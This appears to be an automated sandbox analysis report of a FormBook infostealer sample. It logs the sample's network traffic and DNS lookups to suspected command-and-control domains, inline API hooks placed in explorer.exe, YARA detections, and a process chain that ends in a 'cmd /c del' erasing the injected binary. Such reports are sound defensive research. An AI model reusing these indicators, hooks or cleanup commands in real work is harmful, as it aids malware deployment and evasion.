                Nov 3, 2022 12:39:57.640667915 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:57.640702009 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:57.819936037 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:57.819999933 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:57.820017099 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:57.820031881 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:57.820125103 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:57.820158958 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:57.872545004 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:57.997368097 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:57.997410059 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:57.997458935 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:57.997530937 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:57.997567892 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:57.997567892 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:57.997586012 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:57.997622967 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:57.997632027 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:57.997632980 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:57.997662067 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:57.997689962 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.175142050 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.175272942 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.175385952 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.175427914 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.175431013 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.175487995 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.175502062 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.175551891 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.175565958 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.175580025 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.175621033 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.175745010 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.175857067 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.353627920 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.353775024 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.353818893 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.353848934 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.353869915 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.353893995 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.354007959 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.354073048 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.354207039 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.354294062 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.354432106 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.354499102 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.354631901 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.354705095 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.533330917 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.533480883 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.533509970 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.533618927 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.533631086 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.533655882 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.533679962 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.533711910 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.533741951 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.533799887 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.533857107 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.533926964 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.533982992 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.534043074 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.534089088 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.534158945 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.534224987 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.534296036 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.534343958 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.534409046 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.534466028 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.534524918 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.712263107 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.712383032 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.712660074 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.712667942 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.712697983 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.712798119 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.712939024 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.713038921 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.713177919 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.713260889 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.713460922 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.713546991 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.713736057 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.713886976 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.713890076 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.713900089 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.713972092 CET49701443192.168.2.650.115.174.192
                Nov 3, 2022 12:39:58.713978052 CET4434970150.115.174.192192.168.2.6
                Nov 3, 2022 12:39:58.714051962 CET49701443192.168.2.650.115.174.192

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Nov 3, 2022 12:39:56.025984049 CET5957553192.168.2.68.8.8.8
                Nov 3, 2022 12:39:56.357557058 CET53595758.8.8.8192.168.2.6
                Nov 3, 2022 12:41:36.152439117 CET5859553192.168.2.68.8.8.8
                Nov 3, 2022 12:41:36.184751987 CET53585958.8.8.8192.168.2.6

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Nov 3, 2022 12:39:56.025984049 CET192.168.2.68.8.8.80x1cceStandard query (0)tgc8x.tkA (IP address)IN (0x0001)false
                Nov 3, 2022 12:41:36.152439117 CET192.168.2.68.8.8.80x7240Standard query (0)www.mercydm.mobiA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Nov 3, 2022 12:39:56.357557058 CET8.8.8.8192.168.2.60x1cceNo error (0)tgc8x.tk50.115.174.192A (IP address)IN (0x0001)false
                Nov 3, 2022 12:41:36.184751987 CET8.8.8.8192.168.2.60x7240No error (0)www.mercydm.mobimercydm.mobiCNAME (Canonical name)IN (0x0001)false
                Nov 3, 2022 12:41:36.184751987 CET8.8.8.8192.168.2.60x7240No error (0)mercydm.mobi34.102.136.180A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • tgc8x.tk
                • www.mercydm.mobi

                Code Manipulations

                User Modules

                Hook Summary

                Function NameHook TypeActive in Processes
                PeekMessageAINLINEexplorer.exe
                PeekMessageWINLINEexplorer.exe
                GetMessageWINLINEexplorer.exe
                GetMessageAINLINEexplorer.exe

                Processes

                Process: explorer.exe, Module: user32.dll
                Function NameHook TypeNew Data
                PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE9
                PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE9
                GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE9
                GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE9

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:12:39:53
                Start date:03/11/2022
                Path:C:\Users\user\Desktop\U8RYIwIvfK.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\U8RYIwIvfK.exe
                Imagebase:0x240000
                File size:74240 bytes
                MD5 hash:6F53598B9C19B30A0CF3FF0432301708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                General

                Target ID:1
                Start time:12:39:59
                Start date:03/11/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Imagebase:0x120000
                File size:55400 bytes
                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Target ID:2
                Start time:12:39:59
                Start date:03/11/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Imagebase:0x3c0000
                File size:55400 bytes
                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Target ID:3
                Start time:12:39:59
                Start date:03/11/2022
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Imagebase:0x6a0000
                File size:55400 bytes
                MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:moderate

                General

                Target ID:4
                Start time:12:40:02
                Start date:03/11/2022
                Path:C:\Windows\explorer.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Explorer.EXE
                Imagebase:0x7ff647860000
                File size:3933184 bytes
                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:high

                General

                Target ID:14
                Start time:12:40:44
                Start date:03/11/2022
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\cmd.exe
                Imagebase:0x1b0000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:high

                General

                Target ID:15
                Start time:12:40:49
                Start date:03/11/2022
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Imagebase:0x1b0000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:16
                Start time:12:40:49
                Start date:03/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6da640000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language

                Disassembly

                No disassembly